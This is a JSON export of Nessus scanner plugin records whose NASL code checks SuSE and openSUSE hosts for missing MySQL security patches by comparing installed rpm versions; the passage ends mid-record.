{"nessus": [{"lastseen": "2021-01-17T14:46:46", "description": "This update fixes various security issues (bnc#557669) :\n\nupstream #47320 - checking server certificates (CVE-2009-4028)\nupstream #48291 - error handling in subqueries (CVE-2009-4019)\nupstream #47780 - preserving null_value flag in GeomFromWKB()\n(CVE-2009-4019) upstream #39277 - symlink behaviour fixed\n(CVE-2008-7247) upstream #32167 - symlink behaviour refixed\n(CVE-2009-4030) fixing remote buffer overflow. (CVE-2009-4484)", "edition": 24, "published": "2010-03-19T00:00:00", "title": "SuSE 10 Security Update : MySQL (ZYPP Patch Number 6897)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019", "CVE-2009-4484"], "modified": "2010-03-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_MYSQL-6897.NASL", "href": "https://www.tenable.com/plugins/nessus/45107", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(45107);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\", \"CVE-2009-4484\");\n\n script_name(english:\"SuSE 10 Security Update : MySQL (ZYPP Patch Number 6897)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes various security issues (bnc#557669) :\n\nupstream #47320 - checking server certificates (CVE-2009-4028)\nupstream #48291 - error handling in subqueries (CVE-2009-4019)\nupstream #47780 - preserving null_value flag in GeomFromWKB()\n(CVE-2009-4019) upstream #39277 - symlink behaviour fixed\n(CVE-2008-7247) upstream #32167 - symlink behaviour refixed\n(CVE-2009-4030) fixing remote buffer overflow. (CVE-2009-4484)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-7247.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4019.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4030.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4484.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6897.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MySQL yaSSL CertDecoder::GetName Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 59, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mysql-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mysql-client-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mysql-devel-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mysql-shared-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"mysql-shared-32bit-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mysql-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mysql-Max-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mysql-client-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mysql-devel-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mysql-shared-5.0.26-12.24.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"mysql-shared-32bit-5.0.26-12.24.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:04:47", "description": "Updated mysql packages fix the following bugs :\n\n - upstream #47320 - checking server certificates\n (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries\n (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in\n GeomFromWKB() (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed\n (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed\n (CVE-2009-4030)", "edition": 25, "published": "2010-05-05T00:00:00", "title": "openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2010-05-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mysql-test", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:novell:opensuse:mysql-client", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit", "p-cpe:/a:novell:opensuse:mysql-tools", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mysql-Max", "p-cpe:/a:novell:opensuse:libmysqlclient15-32bit", "p-cpe:/a:novell:opensuse:mysql-debug", "p-cpe:/a:novell:opensuse:libmysqlclient_r15", "p-cpe:/a:novell:opensuse:mysql-bench", "p-cpe:/a:novell:opensuse:libmysqlclient15"], "id": "SUSE_11_1_LIBMYSQLCLIENT-DEVEL-100401.NASL", "href": "https://www.tenable.com/plugins/nessus/46232", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmysqlclient-devel-2315.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46232);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-2)\");\n script_summary(english:\"Check for the libmysqlclient-devel-2315 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mysql packages fix the following bugs :\n\n - upstream #47320 - checking server certificates\n (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries\n (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in\n GeomFromWKB() (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed\n (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed\n (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-05/msg00006.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmysqlclient-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-Max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libmysqlclient-devel-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libmysqlclient15-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libmysqlclient_r15-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-Max-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-bench-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-client-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-debug-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-test-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-tools-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"libmysqlclient15-32bit-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"libmysqlclient_r15-32bit-5.0.67-12.17.7\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient15 / libmysqlclient15-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:13:18", "description": "Updated MySQL packages fix the following bugs :\n\n - upstream #47320 - checking server certificates.\n (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries.\n (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in\n GeomFromWKB(). (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed.\n (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed\n (CVE-2009-4030)", "edition": 24, "published": "2010-12-02T00:00:00", "title": "SuSE 11 Security Update : MySQL (SAT Patch Number 2317)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2010-12-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:libmysqlclient_r15-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mysql-client", "p-cpe:/a:novell:suse_linux:11:mysql-Max", "p-cpe:/a:novell:suse_linux:11:libmysqlclient_r15", "p-cpe:/a:novell:suse_linux:11:libmysqlclient15-32bit", "p-cpe:/a:novell:suse_linux:11:mysql", "p-cpe:/a:novell:suse_linux:11:libmysqlclient15"], "id": "SUSE_11_LIBMYSQLCLIENT-DEVEL-100429.NASL", "href": "https://www.tenable.com/plugins/nessus/50935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50935);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"SuSE 11 Security Update : MySQL (SAT Patch Number 2317)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated MySQL packages fix the following bugs :\n\n - upstream #47320 - checking server certificates.\n (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries.\n (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in\n GeomFromWKB(). (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed.\n (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed\n (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-7247.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4019.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4030.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 2317.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libmysqlclient15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libmysqlclient15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libmysqlclient_r15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libmysqlclient_r15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mysql-Max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"libmysqlclient15-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"libmysqlclient_r15-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mysql-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mysql-client-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libmysqlclient15-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libmysqlclient15-32bit-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libmysqlclient_r15-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libmysqlclient_r15-32bit-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mysql-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mysql-client-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"libmysqlclient15-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"libmysqlclient_r15-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mysql-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mysql-Max-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mysql-client-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"libmysqlclient15-32bit-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"libmysqlclient15-32bit-5.0.67-13.20.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:03:30", "description": "This update fixes several security issues in mysql :\n\n - checking server certificates (CVE-2009-4028)\n\n - error handling in subqueries (CVE-2009-4019)\n\n - preserving null_value flag in GeomFromWKB\n (CVE-2009-4019)\n\n - symlink behavior fixed (CVE-2008-7247)\n\n - symlink behavior refixed (CVE-2009-4030)", "edition": 25, "published": "2010-05-04T00:00:00", "title": "openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2010-05-04T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:novell:opensuse:mysql-client", "p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit", "p-cpe:/a:novell:opensuse:mysql-tools", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mysql-Max", "p-cpe:/a:novell:opensuse:libmysqlclient15-32bit", "p-cpe:/a:novell:opensuse:mysql-debug", "p-cpe:/a:novell:opensuse:libmysqlclient_r15", "p-cpe:/a:novell:opensuse:mysql-bench", "p-cpe:/a:novell:opensuse:libmysqlclient15"], "id": "SUSE_11_0_LIBMYSQLCLIENT-DEVEL-091216.NASL", "href": "https://www.tenable.com/plugins/nessus/46218", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmysqlclient-devel-1706.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46218);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-1)\");\n script_summary(english:\"Check for the libmysqlclient-devel-1706 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in mysql :\n\n - checking server certificates (CVE-2009-4028)\n\n - error handling in subqueries (CVE-2009-4019)\n\n - preserving null_value flag in GeomFromWKB\n (CVE-2009-4019)\n\n - symlink behavior fixed (CVE-2008-7247)\n\n - symlink behavior refixed (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-05/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmysqlclient-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-Max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libmysqlclient-devel-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libmysqlclient15-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libmysqlclient_r15-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-Max-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-bench-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-client-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-debug-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-tools-5.0.51a-27.6\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", 